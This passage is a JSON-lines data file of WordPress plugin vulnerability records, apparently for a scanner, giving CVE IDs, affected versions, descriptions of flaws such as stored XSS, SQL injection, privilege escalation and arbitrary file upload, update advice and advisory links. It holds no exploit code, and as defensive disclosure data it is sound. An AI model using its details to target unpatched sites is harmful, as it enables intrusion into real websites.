version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/dethemekit-addons.js#L815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/dethemekit-addons.js#L815\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255121%40dethemekit-for-elementor&new=3255121%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255121%40dethemekit-for-elementor&new=3255121%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e01ae00-0d07-4e9a-928e-e10cf679df2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e01ae00-0d07-4e9a-928e-e10cf679df2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7070","slug":"email-encoder-bundle","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The Email Encoder \u2013 Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's eeb_mailto shortcode in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5afe6ea-93b8-4782-8593-76468e370a45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5afe6ea-93b8-4782-8593-76468e370a45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L518\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L518\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019206%40email-encoder-bundle&new=3019206%40email-encoder-bundle&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019206%40email-encoder-bundle&new=3019206%40email-encoder-bundle&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11438","slug":"stream-status-for-twitch","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The StreamWeasels Online Status Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sw-status-bar' shortcode in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192626%40stream-status-for-twitch&new=3192626%40stream-status-for-twitch&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192626%40stream-status-for-twitch&new=3192626%40stream-status-for-twitch&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cfbb817-1bb2-4829-9a63-d8e579053000?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cfbb817-1bb2-4829-9a63-d8e579053000?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1805","slug":"product-catalog-feed","versionEndExcluding":"2.1.1","description":"The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46b4582f-7651-4b74-a00b-1788587ecfa8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46b4582f-7651-4b74-a00b-1788587ecfa8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1804","slug":"product-catalog-feed","versionEndExcluding":"2.1.1","description":"The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the edit parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55b28fa6-a54f-4365-9d59-f9e331c1e11b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55b28fa6-a54f-4365-9d59-f9e331c1e11b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12585","slug":"propertyhive","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The Property Hive WordPress plugin before 2.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afecf367-d298-4f4c-8f47-4e19b3937d3e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afecf367-d298-4f4c-8f47-4e19b3937d3e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3895","slug":"wp-datepicker","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The WP Datepicker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpdp_add_new_datepicker_ajax() function in all versions up to, and including, 2.1.0. This makes it possible for authenticated attackers, with  subscriber-level access and above, to update arbitrary options that can be used for privilege escalation. This was partially patched in 2.0.9 and 2.1.0, and fully patched in 2.1.1.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a42f20-a4d7-4c8e-a144-505a6723a2a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a42f20-a4d7-4c8e-a144-505a6723a2a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073525\\\/wp-datepicker\\\/trunk\\\/inc\\\/functions_inner.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073525\\\/wp-datepicker\\\/trunk\\\/inc\\\/functions_inner.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3073221%40wp-datepicker&new=3073221%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3073221%40wp-datepicker&new=3073221%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071975%40wp-datepicker&new=3071975%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071975%40wp-datepicker&new=3071975%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3418","slug":"wpc-admin-columns","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The WPC Admin Columns plugin for WordPress is vulnerable to privilege escalation in versions 2.0.6 to 2.1.0. This is due to the plugin not properly restricting user meta values that can be updated through the ajax_edit_save() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to that of an administrator.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269302\\\/wpc-admin-columns\\\/trunk\\\/includes\\\/class-backend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3269302\\\/wpc-admin-columns\\\/trunk\\\/includes\\\/class-backend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6145e2d7-c917-4814-a13e-6d34088cb784?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6145e2d7-c917-4814-a13e-6d34088cb784?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5450","slug":"bug-library","versionImpact":"2.1","versionEndExcluding":"2.1.1","description":"The Bug Library WordPress plugin before 2.1.1 does not check the file type on user-submitted bug reports, allowing an unauthenticated user to upload PHP files","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d91217bc-9f8f-4971-885e-89edc45b2a4d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d91217bc-9f8f-4971-885e-89edc45b2a4d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9879","slug":"website-file-changes-monitor","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The Melapress File Monitor WordPress plugin before 2.1.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cda54097-4aec-472e-a73f-31ecb76ebb23\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cda54097-4aec-472e-a73f-31ecb76ebb23\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12448","slug":"posts-and-products-views","versionImpact":"2.1","versionEndExcluding":"2.1.1","description":"The Posts and Products Views for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'papvfwc_views' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-and-products-views\\\/trunk\\\/posts-and-products-views-for-woocommerce.php#L169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-and-products-views\\\/trunk\\\/posts-and-products-views-for-woocommerce.php#L169\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-and-products-views\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-and-products-views\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11383","slug":"cc-canadian-mortgage-calculator","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The CC Canadian Mortgage Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cc-mortgage-canada' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216591%40cc-canadian-mortgage-calculator&new=3216591%40cc-canadian-mortgage-calculator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216591%40cc-canadian-mortgage-calculator&new=3216591%40cc-canadian-mortgage-calculator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0654e3c9-106d-4d90-a4e4-9705c36f7564?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0654e3c9-106d-4d90-a4e4-9705c36f7564?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9234","slug":"gutenkit-blocks-addon","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The GutenKit \u2013 Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function  (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44c5dc0-6bf6-417a-9383-b345ff57ac32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44c5dc0-6bf6-417a-9383-b345ff57ac32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-gutenkit-blocks-addon\\\/blob\\\/dc3738bb821cf1d93a11379b8695793fa5e1b9e6\\\/gutenkit-blocks-addon\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php#L76\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-gutenkit-blocks-addon\\\/blob\\\/dc3738bb821cf1d93a11379b8695793fa5e1b9e6\\\/gutenkit-blocks-addon\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.0\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3159783#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.0\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3159783#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.1\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3164886\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenkit-blocks-addon\\\/tags\\\/2.1.1\\\/includes\\\/Admin\\\/Api\\\/ActivePluginData.php?rev=3164886\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7848","slug":"user-private-files","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The User Private Files \u2013 WordPress File Sharing Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'dpk_upvf_update_doc' due to missing validation on the 'docid' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to gain access to other user's private files.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb06de8-97d6-46c3-83ef-93a209540259?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb06de8-97d6-46c3-83ef-93a209540259?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3136913%40user-private-files&new=3136913%40user-private-files&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3136913%40user-private-files&new=3136913%40user-private-files&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2842","slug":"wp-inventory-manager","versionEndExcluding":"2.1.0.14","description":"The WP Inventory Manager WordPress plugin before 2.1.0.14 does not have CSRF checks, which could allow attackers to make logged-in admins delete Inventory Items via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0357ecc7-56f5-4843-a928-bf2d3ce75596\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0357ecc7-56f5-4843-a928-bf2d3ce75596\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2123","slug":"wp-inventory-manager","versionEndExcluding":"2.1.0.13","description":"The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44448888-cd5d-482e-859e-123e442ce5c1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44448888-cd5d-482e-859e-123e442ce5c1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-encoded-wp-inventory-manager-plugin\",\"name\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-encoded-wp-inventory-manager-plugin\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1806","slug":"wp-inventory-manager","versionEndExcluding":"2.1.0.12","description":"The WP Inventory Manager WordPress plugin before 2.1.0.12 does not sanitise and escape the message parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as administrators.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38d99c7d-2d10-4910-b95a-1cb545b813c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38d99c7d-2d10-4910-b95a-1cb545b813c4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4085","slug":"docollipics-faustball-de","versionImpact":"2.0.4","versionEndExcluding":"2.1.0","description":"The Tabellen von faustball.com plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7417e25-be35-4134-9d38-f8ee91f0d1cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7417e25-be35-4134-9d38-f8ee91f0d1cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078169%40docollipics-faustball-de%2Ftrunk&old=3076848%40docollipics-faustball-de%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078169%40docollipics-faustball-de%2Ftrunk&old=3076848%40docollipics-faustball-de%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10009","slug":"website-file-changes-monitor","versionImpact":"2.0.2","versionEndExcluding":"2.1.0","description":"The Melapress File Monitor WordPress plugin before 2.1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2b1f9f4-d5f3-4975-afd1-50eaf193e2ab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13321","slug":"analyticswp","versionImpact":"2.0.0","versionEndExcluding":"2.1.0","description":"The AnalyticsWP plugin for WordPress is vulnerable to SQL Injection via the 'custom_sql' parameter in all versions up to, and including, 2.0.0 due to insufficient authorization checks on the handle_get_stats() function.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/analyticswp.com\\\/\",\"name\":\"https:\\\/\\\/analyticswp.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6507318-92c0-457c-8c87-2d023428a77f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6507318-92c0-457c-8c87-2d023428a77f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36834","slug":"woo-discount-rules","versionImpact":"2.0.2","versionEndExcluding":"2.1.0","description":"The Discount Rules for WooCommerce plugin for WordPress is vulnerable to missing authorization via several AJAX actions in versions up to, and including, 2.0.2 due to missing capability checks on various functions. This makes it possible for subscriber-level attackers to execute various actions and perform a wide variety of actions such as modifying rules and saving configurations.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cf27ba-a01b-4e34-9584-b1d3fc87af34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cf27ba-a01b-4e34-9584-b1d3fc87af34?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-vulnerabilities-in-discount-rules-for-woocommerce-plugin\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-vulnerabilities-in-discount-rules-for-woocommerce-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7714","slug":"ays-chatgpt-assistant","versionImpact":"2.0.9","versionEndExcluding":"2.1.0","description":"The AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 lacks sufficient access controls allowing an unauthenticated user to disconnect the AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 from OpenAI, thereby disabling the AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0. Multiple actions are accessible: 'ays_chatgpt_disconnect', 'ays_chatgpt_connect', and  'ays_chatgpt_save_feedback'","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04447c76-a61b-4091-a510-c76fc8ca5664\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04447c76-a61b-4091-a510-c76fc8ca5664\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7713","slug":"ays-chatgpt-assistant","versionImpact":"2.0.9","versionEndExcluding":"2.1.0","description":"The AI ChatBot with ChatGPT and Content Generator by AYS WordPress plugin before 2.1.0 discloses the Open AI API Key, allowing unauthenticated users to obtain it","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061eab97-4a84-4738-a1e8-ef9a1261ff73\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061eab97-4a84-4738-a1e8-ef9a1261ff73\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12525","slug":"easy-mls-listings-import","versionImpact":"2.0.1","versionEndExcluding":"2.1.0","description":"The Easy MLS Listings Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-featured-listings' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-mls-listings-import\\\/trunk\\\/includes\\\/class-homeasap-featured-listings-loader.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-mls-listings-import\\\/trunk\\\/includes\\\/class-homeasap-featured-listings-loader.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6351a40d-523d-4edb-acba-5cf048a1014f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6351a40d-523d-4edb-acba-5cf048a1014f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9377","slug":"export-woocommerce","versionImpact":"2.0.15","versionEndExcluding":"2.1.0","description":"The Products, Order & Customers Export for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.15. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67d2e1c7-dbd3-4195-8bdb-3b85b25bfa52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67d2e1c7-dbd3-4195-8bdb-3b85b25bfa52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164996\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164996\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-woocommerce\\\/tags\\\/2.0.15\\\/includes\\\/class-alg-wc-export-core.php#L216\",\"refsource\":\"\",\"tags\":[]}]"}
